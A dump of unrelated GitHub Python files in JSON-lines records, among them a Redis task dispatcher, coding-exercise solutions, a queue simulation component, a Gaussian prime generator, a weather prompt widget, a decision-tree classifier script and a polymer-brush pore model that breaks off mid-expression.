fenetreComparaison.createComparisonWindow(results, original_data_puissances, original_data_debits, _VARS['window'])\r\n            except :\r\n                #If reading fails the file is probably open elsewhere, so we inform the user\r\n                sg.Popup(\"Error reading the file, please make sure the information is correct\", title=\"Read error\", button_color= \"red\")\r\n        \r\n    _VARS['window'].close()\r\n    ","repo_name":"Iilu-n/Projet_Optimisation","sub_path":"selectionFichierComparaison.py","file_name":"selectionFichierComparaison.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1796336545","text":"# -*- coding: utf-8 -*-\n\nimport redis\n\nimport fetch_util\nimport redis_util\n\n'''\nTask dispatching from redis\n\nLogic: create a new hash table in redis, with entries formatted like: 100000,no\n\n# Then keep fetching data from it; once fetched, mark the task status (initial(0), fetched(1), success(2), failed(3))\nThen keep fetching data from it; once fetched, mark the task status (initial(0), success(2), failed(3))\n\n'''\n\n\n# Fetch a task\ndef get_task(redic_client, hash_key, value_key):\n    redis_resp = redic_client.hget(hash_key, value_key)\n    if redis_resp:\n        # Fetch the task and set its status to 'yes'\n        redic_client.hset(hash_key, value_key, 1)\n        return redis_resp\n\n\n# Mark a task; status flags: initial(0), fetched(1), success(2), failed(3)\ndef sign_task(redic_client, hash_key, value_key, status):\n    redic_client.hset(hash_key, value_key, status)\n\n\n# Get the total number of tasks; the return value is an int\ndef get_all_task_size(redis_client, hash_key):\n    return redis_client.hlen(hash_key)\n\n\n# Split the total task count across threads\n# def dispatch_task_size(all_task_size, thread_num):\n#     sign_task_num = all_task_size / thread_num\n#     task_list = []\n#     count = 0\n#     for index in range(thread_num):\n#         count += 1\n#         t = (count, int(sign_task_num * count))\n#         task_list.append(t)\n#     return task_list\n\n\n#\ndef get_all_task_iter(redis_client, hash_key):\n    result_iter = redis_client.hscan_iter(hash_key)\n    return result_iter\n\n\n# Load tasks into the queue\ndef get_task_queue(queue, task_iter):\n    for task in task_iter:\n        status = task[1]\n        status = fetch_util.byte_to_str(status)\n        # print(\"status:\", status)\n        if status == '0':\n            queue.put(task)\n\n# Increment the result counter\ndef count_result(redis_client, key):\n    return redis_client.incr(key)\n\n\nif __name__ == '__main__':\n    # redisPool = RedisPool()\n    # conn = redisPool.connection()\n    # redis_client = redis.Redis(connection_pool=redisPool.connection())\n\n    redis_pool = redis_util.get_redis_pool_connection()\n    redis_client = redis.Redis(connection_pool=redis_pool)\n\n    # resp = redis_client.hget('jd_20161024', '1000004')\n    # resp = resp.decode()\n    # print(resp)\n    #\n    # redis_client.hset('jd_20161024', '1000004', 'yes')\n    #\n    # print(type(resp))\n\n    # resp = get_task(redis_client, 'jd_20161024', '1000007')\n    # print(resp)\n\n    # sign_task(redis_client, 'jd_20161024', '1000007', 7)\n\n    # resp2 = get_all_task_size(redis_client, 'jd_20161024')\n    # print(type(resp2))\n    # print(resp2)\n\n    # tasks = dispatch_task_size(100, 6)\n    #\n    # for task in tasks:\n    #     print(task)\n    #     print(type(task))\n\n\n    # res = redis_client.hscan_iter(\"jd_20161024\", count=10)\n    #\n    # print(len(res))\n\n    # first = True\n    # for re in res:\n    #     print(re)\n    #     if first:\n    #         print(type(re))\n    #         print(\"----\\n\")\n    #         first = False\n    #     break\n\n\n    # res = redis_client.hscan(\"jd_20161024\", 0, None)\n\n    # for r in res:\n    #     print(r)\n\n\n\n\n\n\n    # cursor, data = redis_client.hscan(\"jd_20161024\", 0, None)\n\n    # print(cursor)\n    # print(len(data))\n    #\n    # cursor, data = redis_client.hscan(\"jd_20161024\", cursor, None)\n    #\n    # print(cursor)\n    # print(len(data))\n    # cursor, data = redis_client.hscan(\"jd_20161024\", cursor, 
None)\n #\n # print(cursor)\n # print(len(data))\n # cursor, data = redis_client.hscan(\"jd_20161024\", cursor, None)\n #\n # print(cursor)\n # print(len(data))\n\n # print(len(t))\n\n\n # for r in t:\n # print(r)\n\n\n\n res = redis_client.hscan_iter(\"jd_20161024\", None, 10)\n\n # print(res.__next__())\n\n for r in res:\n print(r)\n\n pass\n","repo_name":"lancong/Spiders","sub_path":"task_dispatch.py","file_name":"task_dispatch.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"9364404235","text":"def toSeconds(h, m, s):\n return h * 60 * 60 + m * 60 + s\n\nn = int(input())\n\nintervals = [[] for i in range(n)]\n\nfor i in range(n):\n h1, m1, s1, h2, m2, s2 = map(int, input().split())\n intervals[i] = [toSeconds(h1, m1, s1), toSeconds(h2, m2, s2)]\n\nintervals.sort(key=lambda x: x[0])\n\nresult = toSeconds(20, 0, 0) - toSeconds(8, 0, 0)\nstart = intervals[0][0]\nend = intervals[0][1]\n\nfor interval in intervals:\n if interval[0] <= end: \n end = max(end, interval[1])\n else:\n result -= end - start\n start = interval[0]\n end = interval[1]\n \n\nresult -= end - start\nprint(result)\n\n\n \n \n","repo_name":"AndrewOleksiuk/Algorithms","sub_path":"algotester0173.py","file_name":"algotester0173.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"75330061159","text":"from collections import deque, namedtuple, OrderedDict\n\nimport numpy as np\n\nfrom despy.model.component import Component\nfrom despy.output.report import Datatype\nimport despy.output.plot as plot\nfrom despy.output.statistic import DiscreteStatistic\nfrom despy.output.statistic import TimeWeightedStatistic\n\nclass Queue(Component):\n \"\"\"A component that represents a real world queue.\n \n A Queue object represents a real-world queue, such as a line of\n customers waiting for a server, or a line of products waiting for a\n machine.\n \n **Inherited Classes**\n * :class:`despy.base.named_object2.NamedObject`\n * :class:`despy.model.component.Component`\n \n **Members**\n \n .. autosummary::\n \n Item\n length\n times_in_queue\n add\n remove\n get_data\n \n \"\"\"\n\n def __init__(self, name, max_length = None,\n description = None):\n \"\"\"Create a Queue object.\n \n *Arguments*\n ``model`` (:class:`despy.model.model.Model`)\n The Queue must be assigned to a Model object.\n ``name`` (String)\n A short descriptive name for the Queue object.\n ``max_length`` (Integer)\n If ``None`` (default value), then the Queue length can\n grow indefinitely. If set to an integer, the Queue will\n be limited to ``max_length``.\n ``description`` (String)\n Optional. Default is None. 
\n \"\"\"\n \n super().__init__(name, description = description)\n if isinstance(max_length, int):\n self._queue = deque(max_length)\n else:\n self._queue = deque()\n self._times_in_queue = []\n self.results.stats['Queue_time'] = DiscreteStatistic('w_q', 'u4')\n self.results.stats['Queue_length'] = TimeWeightedStatistic('L_q', 'u4')\n \n Item = namedtuple('Item', ['item_fld', 'time_in_fld'])\n \"\"\"(Class) A named tuple that contains an item added to the queue.\n \n *Attributes*\n ``item_fld``\n An object that is added to the queue.\n ``time_in_fld``\n The time the object was added to the queue.\n \"\"\"\n\n @property\n def length(self):\n \"\"\"The number of entities in the queue at the current time.\n \n *Type:* Integer, read-only.\n \"\"\"\n return len(self._queue)\n\n @property\n def times_in_queue(self):\n \"\"\"List of times (integers) that entities spent in the queue.\n \n *Type:* List of integers, read-only.\n \n The first element of the list is the time that the first entity\n to leave the queue spent in the queue, the second element is for\n the second entity to leave the queue, etc.\n \"\"\"\n return self._times_in_queue\n \n def setup(self):\n self.results.stats['Queue_length'].append(self.sim.now,\n self.length)\n# \n# def finalize(self):\n# self.statistics['Queue_length'].append(self.sim.now,\n# self.length)\n\n def teardown(self):\n self.clear()\n\n def add(self, item):\n \"\"\"Add an item to the end of the queue.\n \n *Arguments*\n ``item``\n The item that will be added to the queue.\n \"\"\"\n self._queue.append(Queue.Item(item_fld = item, \\\n time_in_fld = self.sim.now))\n message = \"Entering Queue\"\n fields = OrderedDict()\n fields[\"Length\"] = self.length\n fields[\"Entity\"] = str(item)\n self.sim.results.trace.add_message(message, fields)\n \n def remove(self):\n \"\"\"Remove an item from the beginning of the queue.\n \n *Arguments*\n ``item``\n The item that will be removed from the queue.\n \n *Returns:* The item that was removed from the queue.\n \"\"\"\n item = self._queue.popleft()\n q_time = self.sim.now - item.time_in_fld\n self.times_in_queue.append(q_time)\n self.results.stats['Queue_time'].append(self.sim.now, q_time)\n \n message = \"Leaving Queue\"\n fields = OrderedDict()\n fields[\"Length\"] = self.length\n fields[\"Entity\"] = str(item.item_fld)\n fields[\"Time_in_Q\"] = q_time\n self.sim.results.trace.add_message(message, fields) \n \n return item.item_fld\n \n def clear(self):\n self._queue.clear()\n \n def get_data(self, full_path):\n \"\"\"Creates charts and adds data to final report.\n \n *Arguments*\n ``folder`` (String)\n All charts will be saved to the location denoted by\n 'folder'.\n \n *Returns:* A despy.model.output.Datatype formatted list\n containing data for the final report.\n \"\"\"\n # Create Time in Queue Histogram\n qtimes = np.array(self.times_in_queue, np.int32)\n qtime_filename = '{0}_time_in_q'.format(self.id)\n full_fname = plot.Histogram(self.times_in_queue, full_path,\n qtime_filename,\n title = self.name,\n x_label = \"Time in Queue\",\n y_label = \"Frequency\") \n \n # Create output\n output = [(Datatype.title, \"Queue Results: {0}\".format(self.name)),\n (Datatype.paragraph, self.description.__str__()),\n (Datatype.param_list,\n [('Maximum Time in Queue', np.amax(qtimes)),\n ('Minimum Time in Queue', np.amin(qtimes)),\n ('Mean Time in Queue', np.mean(qtimes))]),\n (Datatype.image, full_fname)]\n \n return 
output","repo_name":"irwinsnet-old/DesPy","sub_path":"despy/model/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":5846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"13139273069","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport prime\nimport generator\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\nclass Generator(generator.Generator):\n \"\"\"Generator child class for generating Gaussian Primes.\n\n Note that minimum and maximum inputs to this class have type of complex,\n rather than the usual int.\n\n Attributes:\n limit (int): The limit required to generate the list of primes. This\n needs to be calculated to fully cover the range of the \n gaussian primes.\n primes (list): Set of primes required to construct the list of gaussian\n primes.\n \n Keyword Arguments:\n minimum -- the lower limit of the dataset (default complex(0, 0))\n maximum -- the upper limit of the dataset (default complex(1, 1))\n \"\"\"\n def __init__(self, minimum=complex(0, 0), maximum=complex(1, 1)):\n super(self.__class__, self).__init__(minimum, maximum)\n self.path = \"primes/generator/data/gaussians/\"\n self.datatype = complex\n # the threshold for this dataset should be slightly more lenient \n # than usual\n self.threshold = 300\n self.limit = max([np.real(self.minimum)**2 + np.imag(self.minimum)**2,\n np.real(self.maximum)**2 + np.imag(self.maximum)**2])\n sieve = prime.Generator(maximum=int(self.limit))\n sieve.generate()\n self.primes = sieve.data\n\n def generate(self):\n \"\"\"Generates the set of Gaussian Primes within the constraints of the \n minimum and maximum passed to this class, subject to values outputted by\n the `is_gaussian_prime' function.\n \n See the generate function stub in the Generator parent class for more\n information.\n \"\"\"\n logger.info(\"Checking cache\")\n self.data = self.read_cache()\n cache_miss = self.not_in_cache()\n if cache_miss:\n self.data = list(self.data)\n for n in cache_miss[0]:\n if self.is_gaussian_prime(n):\n self.data.insert(0, n)\n for n in cache_miss[1]:\n if self.is_gaussian_prime(n):\n self.data.append(n)\n self.data = np.array(self.data)\n else:\n gaussians = []\n logger.info(\"Starting generation\")\n for i in range(np.real(self.minimum), np.real(self.maximum)):\n for j in range(np.imag(self.minimum), np.imag(self.maximum)):\n z = np.complex(i, j)\n if self.is_gaussian_prime(z):\n gaussians.append(z)\n logger.info(\"%s\", str(i))\n logger.info(\"Writing data\")\n self.data = np.array(gaussians)\n self.to_file()\n\n def is_gaussian_prime(self, z):\n \"\"\"Function to determine whether the imputed complex number is a\n Gaussian Prime, subject to the following constraints.\n\n Let z be expressed as a complex number in the form: z = a + bi; where a\n is the real component and b is the imaginary component. 
A Gaussian Prime\n        therefore is a complex number where ONE of the following is true:\n        1) If both a and b are nonzero then, a + bi is a Gaussian Prime iff\n            a**2 + b**2 is an ordinary prime.\n        2) If a = 0, then bi is a Gaussian Prime iff abs(b) is an ordinary\n            prime and abs(b) % 4 = 3.\n        3) If b = 0, then a is a Gaussian Prime iff abs(a) is an ordinary\n            prime and abs(a) % 4 = 3.\n\n        Arguments:\n            z -- a complex number\n        \"\"\"\n        if not isinstance(z, complex):\n            return False\n        re = np.real(z)\n        im = np.imag(z)\n        result = False\n        if re != 0 and im != 0 and re ** 2 + im ** 2 in self.primes:\n            result = True\n        elif re == 0 and abs(im) in self.primes and abs(im) % 4 == 3:\n            result = True\n        elif im == 0 and abs(re) in self.primes and abs(re) % 4 == 3:\n            result = True\n        return result\n","repo_name":"rinfz/Primes","sub_path":"primes/generator/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":4119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24842303768","text":"#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the migratoryBirds function below.\ndef migratoryBirds(arr):\n    birdIdHash = {}\n    maxSightings = 0\n    maxSightingsId = 0\n    for id in arr:\n        if id in birdIdHash:\n            birdIdHash[id] += 1\n        else:\n            birdIdHash[id] = 1\n        if birdIdHash[id] > maxSightings:\n            maxSightings = birdIdHash[id]\n            maxSightingsId = id\n        if birdIdHash[id] == maxSightings and id < maxSightingsId:\n            maxSightingsId = id\n    return maxSightingsId\n\nif __name__ == '__main__':\n    try:\n        fptr = open(os.environ['OUTPUT_PATH'], 'w')\n    except KeyError:\n        fptr = sys.stdout\n\n    arr_count = int(input().strip())\n\n    arr = list(map(int, input().rstrip().split()))\n\n    result = migratoryBirds(arr)\n\n    fptr.write(str(result) + '\\n')\n\n    fptr.close()\n","repo_name":"eggzotic/Hackerrank","sub_path":"MigratoryBirds/MigratoryBirds.py","file_name":"MigratoryBirds.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41847523343","text":"\"\"\"\n    ----------------------------------------------------------------------------\n    \"THE BEER-WARE LICENSE\" (Revision 42):\n     wrote this file. As long as you retain\n    this notice you can do whatever you want with this stuff. 
If we meet\n some day, and you think this stuff is worth it, you can buy me a beer in\n return Anton Bobrov\n ----------------------------------------------------------------------------\n\"\"\"\n\nimport argparse\nimport pycuber as pc\nfrom pycuber.solver import CFOPSolver\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"size\", help=\"number of sets\", type=int)\nparser.add_argument(\"file\", help=\"where to write\")\nargs = parser.parse_args()\n\nfaces = [\"L\", \"R\", \"U\", \"D\", \"B\", \"F\"]\ncolors = {\"[r]\": \"r\",\n \"[y]\": \"y\",\n \"[g]\": \"g\",\n \"[w]\": \"w\",\n \"[o]\": \"o\",\n \"[b]\": \"b\",\n \"[u]\": \"u\"}\n\ndef cubeAsArray(acube):\n cubeArray = []\n for face in faces:\n face = acube.get_face(face)\n for x in [0,1,2]:\n for y in [0,1,2]:\n cubeArray.append(colors[str(face[x][y])])\n return cubeArray\n\ndef solutionAsArray(asolution):\n solutionArray = []\n for step in asolution:\n solutionArray.append(str(step))\n return solutionArray\n\nsetfile = open(args.file, 'w')\n\nfor i in range(args.size):\n cube = pc.Cube()\n alg = pc.Formula()\n random_alg = alg.random()\n cube(random_alg)\n cube_array = cubeAsArray(cube)\n solver = CFOPSolver(cube)\n solution = solver.solve(suppress_progress_messages=True)\n solution_array = solutionAsArray(solution.optimise())\n setfile.write(' '.join(cube_array) + '\\n')\n setfile.write(' '.join(solution_array) + '\\n')\n\nsetfile.close()\n","repo_name":"antbob/qub3rt","sub_path":"gensets.py","file_name":"gensets.py","file_ext":"py","file_size_in_byte":1715,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"18"} +{"seq_id":"21369406003","text":"import requests\nfrom thunderbolt100k import constants\nimport json\nfrom thunderbolt100k.libs.compare_time import compare_time\nfrom thunderbolt100k.libs.common import pl9k_color\nimport datetime\n\nSESSION = requests.session()\n\n\ndef user_input():\n result = dict()\n result['WEATHER_TOKEN'] = raw_input(\"Please input your api key for https://api.apixu.com: \")\n result['WEATHER_CITY'] = raw_input('Please input the city of your location (e.g. 
Shanghai): ')\n return result\n\n\ndef fetch():\n assert 'WEATHER_TOKEN' in constants.CONFIG, 'You must set `THUNDERBOLT_WEATHER_TOKEN` in `~/.zshrc` file'\n assert 'WEATHER_CITY' in constants.CONFIG, 'You must set `THUNDERBOLT_WEATHER_CITY` in `~/.zshrc` file'\n response = SESSION.get(\n 'https://api.apixu.com/v1/forecast.json?key={token}&q={city}&days=2'.format(\n token=constants.CONFIG.get('WEATHER_TOKEN'),\n city=constants.CONFIG.get('WEATHER_CITY')))\n\n return response.content if response.status_code == 200 else None\n\n\ndef display():\n path = constants.DATA_PATH_FORMAT.format('weather')\n with file(path, 'r') as f:\n content = json.load(f)\n now = datetime.datetime.now()\n # Use the next day's forecast info if the time is later than 23:00\n if now.hour >= 23:\n info = content['forecast']['forecastday'][1]['hour'][now.hour - 23]\n else:\n info = content['forecast']['forecastday'][0]['hour'][now.hour + 1]\n\n temp = info['temp_c']\n condition = info['condition']['text']\n update_time = content['current']['last_updated']\n delta_minute, delta_hour, delta_day = compare_time(update_time, '%Y-%m-%d %H:%M')\n\n if 'thunder' in condition or 'Thunder' in condition:\n symbol = \"\\uf0e7\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_THUNDER_COLOR'))\n elif 'rain' in condition or 'drizzle' in condition:\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_RAIN_COLOR'))\n symbol = \"\\ue239\"\n elif 'Cloudy' in condition:\n symbol = \"\\uf0c2\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_CLOUD_COLOR'))\n elif 'Overcast' in condition:\n symbol = \"\\uf0c2\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_OVERCAST_COLOR'))\n elif \"Partly cloudy\" in condition:\n symbol = \"\\ue21d\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_CLOUD_COLOR'))\n elif condition == 'Sunny' or condition == 'Clear':\n symbol = \"\\uf185\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_SUN_COLOR'))\n elif 'snow' in condition:\n symbol = \"\\uf2dc\"\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_SNOW_COLOR'))\n else:\n symbol_color = pl9k_color(constants.CONFIG.get('WEATHER_DEFAULT_COLOR'))\n symbol = \"\\uf422\"\n\n if temp >= 35:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_HIGH_TEMP_COLOR'))\n temp_symbol = '\\uf2c7'\n elif temp >= 28:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_MIDDLE_TEMP_COLOR'))\n temp_symbol = '\\uf2c8'\n elif temp < 10:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_LOW_TEMP_COLOR'))\n temp_symbol = '\\uf2cb'\n else:\n temp_color = pl9k_color(constants.CONFIG.get('WEATHER_DEFAULT_COLOR'))\n temp_symbol = '\\uf2c9'\n\n delay_minutes = delta_minute + 60 * delta_hour + 60 * 24 * delta_day\n\n if delta_day == 0:\n if delta_hour == 0:\n time_string = '>{0} min'.format(delta_minute)\n else:\n time_string = '>{0} hour'.format(delta_hour)\n else:\n time_string = '>{0} day'.format(delta_day)\n\n result = \"%{\" + symbol_color + \"%}\" + symbol + \" %{\" + temp_color + \"%}\" + str(\n temp) + temp_symbol\n\n if delay_minutes >= int(constants.CONFIG.get('WEATHER_SHOW_UPDATE_TIME')):\n result += \"%{\" + pl9k_color(constants.CONFIG.get('WEATHER_UPDATE_TIME_COLOR')) + \"%}\" + \"({0})\".format(\n time_string)\n\n return result\n","repo_name":"cuyu/thunderbolt100k","sub_path":"thunderbolt100k/widgets/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3978,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} 
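The weather record that ends here builds its prompt segment from zsh escapes: "%{...%}" wraps a colour code so the shell treats it as zero-width when computing prompt length. Below is a minimal runnable sketch of that composition; the PALETTE table and the pl9k_color stand-in are hypothetical (the real helper comes from thunderbolt100k.libs.common and is not shown in this record).

PALETTE = {"red": "196", "blue": "33"}  # hypothetical colour table, not from the source

def pl9k_color(name):
    # Stand-in for thunderbolt100k.libs.common.pl9k_color: assumed to map a
    # colour name to a zsh foreground escape.
    return "%F{" + PALETTE.get(name, "250") + "}"

def segment(symbol, symbol_color, temp, temp_color, temp_symbol):
    # "%{...%}" marks the wrapped escape as zero-width for zsh, mirroring
    # the string concatenation in display() above.
    return ("%{" + symbol_color + "%}" + symbol +
            " %{" + temp_color + "%}" + str(temp) + temp_symbol)

print(segment("\uf185", pl9k_color("red"), 31.5, pl9k_color("blue"), "\uf2c8"))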
+{"seq_id":"71285619879","text":"import string\n\n\ndef count_words(text, words):\n t = 0\n text = text.lower()\n for i in string.punctuation:\n text = text.replace(i, '')\n text = set(text.split(' '))\n for j in words:\n for k in text:\n if j in k:\n t += 1\n return t\n\n\nif __name__ == '__main__':\n # These \"asserts\" using only for self-checking and not necessary for auto-testing\n assert count_words(\"How aresjfhdskfhskd you?\", {\"how\", \"are\", \"you\", \"hello\"}) == 3, \"Example\"\n assert count_words(\"Bananas, give me bananas!!!\", {\"banana\", \"bananas\"}) == 2, \"BANANAS!\"\n assert count_words(\"Lorem ipsum dolor sit amet, consectetuer adipiscing elit.\",\n {\"sum\", \"hamlet\", \"infinity\", \"anything\"}) == 1, \"Weird text\"\n print(\"Coding complete? Click 'Check' to review your tests and earn cool rewards!\")\n","repo_name":"lodgeinwh/Study","sub_path":"Python/Py.Checkio/Home/Monkey Typing.py","file_name":"Monkey Typing.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40431496514","text":"import sys\n\ndef add(a, b):\n equal = a + b\n return equal\n\ndef subtract(a, b):\n equal = a - b\n return equal\n\ndef multiply(a, b):\n equal = a * b\n return equal\n\ndef divide(a, b):\n equal = a / b\n return equal\n\ndef choice(a, b, choose):\n if choose == \"add\":\n return add(a, b)\n elif choose == \"subtract\":\n return subtract(a, b)\n elif choose == \"multiply\":\n return multiply(a, b)\n elif choose == \"divide\":\n return divide(a, b) \n\ndef get_input():\n a = sys.argv[1]\n b = sys.argv[2]\n choose = sys.argv[3]\n return int(a), int(b), str(choose)\n\ndef main():\n try:\n a, b, choose = get_input()\n equal = choice(a, b, choose)\n print(equal)\n except Exception as e:\n print(\"error\")\n\nmain()","repo_name":"mursyidmahadi/web-development","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27411094969","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import OrdinalEncoder\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom sklearn.feature_selection import SelectKBest\r\nfrom sklearn.feature_selection import chi2\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.tree import plot_tree\r\n\r\ndf = pd.read_csv('star_classification.csv')\r\n\r\n\r\nplots=[]\r\nfor i in ['rerun_ID']:\r\n g=sns.relplot(data=df,x='obj_ID', y=i, hue='class')\r\n plt.show()\r\n\r\nenc = OrdinalEncoder()\r\ndf['class'] = enc.fit_transform(df[['class']])\r\ndf['class'].head(10)\r\n\r\n\r\nX = df.drop(columns=['class'])\r\ny = df.loc[:, ['class']]\r\nminmax = MinMaxScaler()\r\nscaled = minmax.fit_transform(X)\r\n\r\n\r\nbest_feature = SelectKBest(score_func=chi2)\r\nfit = best_feature.fit(scaled, y)\r\n\r\n\r\nfeature_score = pd.DataFrame({\r\n 'feature' : X.columns,\r\n 'score': fit.scores_\r\n})\r\n\r\n\r\nfeature_score.sort_values(by=['score'], ascending=False, inplace=True)\r\n\r\n\r\n\r\n\r\nstd = StandardScaler()\r\nscaled = std.fit_transform(X)\r\nscaled = pd.DataFrame(scaled, columns=X.columns)\r\n\r\n\r\n\r\ndata_standardization = y.join(scaled)\r\n\r\n\r\nX = data_standardization.loc[:, ['redshift','u', 'g', 'r', 'i', 'z']]\r\ny = data_standardization.loc[:, 
'class']\r\n\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\r\n\r\nfrom sklearn.tree import DecisionTreeClassifier\r\ndt = DecisionTreeClassifier(random_state=42)\r\ndt.fit(x_train, y_train)\r\n\r\nprint(dt.score(x_train,y_train),dt.score(x_test, y_test))\r\nprint(f'train: {round(dt.score(x_train,y_train) * 100, 2)}%')\r\nprint(f'test: {round(dt.score(x_test, y_test) * 100, 2)}%')\r\n\r\n\r\ndt = DecisionTreeClassifier(random_state=42, max_depth=5, min_samples_split=20, min_samples_leaf=5)\r\ndt.fit(x_train, y_train)\r\n\r\nprint(dt.score(x_train, y_train), dt.score(x_test, y_test))\r\nprint(f'train: {round(dt.score(x_train, y_train) * 100, 2)}%')\r\nprint(f'test: {round(dt.score(x_test, y_test) * 100, 2)}%')\r\n\r\nplt.figure(figsize=(10,7))\r\nplot_tree(dt, max_depth=2, filled=True, feature_names=['redshift','u', 'g', 'r', 'i', 'z'])\r\nplt.show()\r\n\r\nfrom sklearn.model_selection import cross_validate\r\nfrom sklearn.ensemble import RandomForestClassifier\r\n\r\nrf = RandomForestClassifier(n_jobs=-1, random_state=42)\r\n\r\nscores = cross_validate(rf, x_train, y_train, cv=2, return_train_score=True, n_jobs=-1, verbose=2)\r\n\r\n\r\nprint(np.mean(scores['train_score']), np.mean(scores['test_score']))\r\nprint(f'train: {round(np.mean(scores[r\"train_score\"]) * 100, 2)}%')\r\nprint(f'test: {round(np.mean(scores[r\"test_score\"]) * 100, 2)}%')\r\n\r\n\r\ndt = DecisionTreeClassifier(max_depth=3, random_state=42)\r\ndt.fit(x_train,y_train)\r\n\r\nprint(dt.score(x_train,y_train),dt.score(x_test, y_test))\r\nprint(f'train: {round(dt.score(x_train,y_train) * 100, 2)}%')\r\nprint(f'test: {round(dt.score(x_test, y_test) * 100, 2)}%')\r\n\r\nplt.figure(figsize=(20,15))\r\nplot_tree(dt, filled=True, feature_names=['redshift','u', 'g', 'r', 'i', 'z'])\r\nplt.show()\r\n","repo_name":"multsidar/IAR_Belov_Shvartsman","sub_path":"trees.py","file_name":"trees.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7477242799","text":"\"\"\"\nThe script provides routines to calculate pore topology restricted \nand unrestricted polymer brushes. \n\nDocs for this module are not yet written, please take a look at \nplain.py script in the same directory, to get the idea of what is going on\n\n@author: Mikhail Laktionov\nmiklakt@gmail.com\n\"\"\"\n\nfrom functools import lru_cache\n\nfrom ascf_pb.solver import Phi\nfrom . 
import common\nfrom scipy.optimize import brentq\nfrom scipy import integrate\nimport numpy as np\nimport logging  # used by phi_D_universal below\n\nphi_D_unrestricted = common.phi_D_unrestricted\n\ndef theta(N : float, sigma : float, pore_Radius : float):\n    return N*sigma*2*np.pi*pore_Radius\n\ndef normalization_unrestricted(\n    chi : float, kappa : float, \n    N : float, sigma : float, \n    phi_D : float, pore_Radius : float):\n    def integrand(z, d):\n        return Phi(z = z, d=d,\n            chi = chi, kappa=kappa, phi_D=phi_D)*abs(pore_Radius - z)\n    def integral(d):\n        return 2*np.pi*integrate.quad(integrand, 0, d, args=(d,))[0] - theta(N, sigma, pore_Radius)\n    return integral\n\ndef D_boundary(pore_Radius : float, phi_const : float, N : float, sigma : float):\n    D = pore_Radius - np.sqrt(pore_Radius**2 - theta(N, sigma, pore_Radius)/(np.pi*phi_const))\n    return D\n\ndef D_unrestricted(\n    chi : float, kappa : float,\n    N : float, sigma : float, \n    pore_Radius : float):\n    phi_D = phi_D_unrestricted(chi)\n    normalization = normalization_unrestricted(\n        chi, kappa, N, sigma, phi_D, pore_Radius)\n    min_D = D_boundary(pore_Radius, 1, N, sigma)\n    #min_D = 0\n    if phi_D == 0: max_D=min(pore_Radius,N)\n    else: max_D=min(pore_Radius,D_boundary(pore_Radius, phi_D, N, sigma))#min(pore_Radius,N)#\n    _D = common.normalization_find_root(normalization, min_D, max_D)\n    return _D\n\n\n################################################################################\ndef normalization_restricted(\n    chi : float, kappa : float, \n    N : float, sigma : float, R : float, \n    pore_Radius : float\n    ):\n    def integrand(z, phi_R):\n        return Phi(z = z, d=R,\n            chi = chi, kappa=kappa, phi_D=phi_R)*abs(pore_Radius - z)\n    def integral(phi_R):\n        return 2*np.pi*integrate.quad(integrand, 0, R, args = (phi_R,))[0] - theta(N, sigma, pore_Radius)\n    return integral\n\n\ndef phi_D_restricted(\n    chi : float, kappa : float, \n    N : float, sigma : float, \n    R : float, pore_Radius : float):\n    phi_R_min = phi_D_unrestricted(chi)\n    phi_R_max = 0.99 #can be evaluated with a separate routine\n    norm = normalization_restricted(chi, kappa, N, sigma, R, pore_Radius)\n    phi_R = brentq(norm, phi_R_min, phi_R_max)\n    return phi_R\n\n\n################################################################################\n#@lru_cache()\ndef phi_D_universal(\n    chi : float, kappa : float, \n    N : float, sigma : float, \n    R : float, pore_Radius : float):\n    try:\n        D = D_unrestricted(chi, kappa, N, sigma, pore_Radius)\n        if R>=D:\n            #brush is not restricted\n            logging.debug(\"Unrestricted\")\n            phi_D = phi_D_unrestricted(chi)\n        else:\n            #brush is restricted\n            logging.debug(\"Restricted\")\n            phi_D = phi_D_restricted(chi, kappa, N, sigma, R, 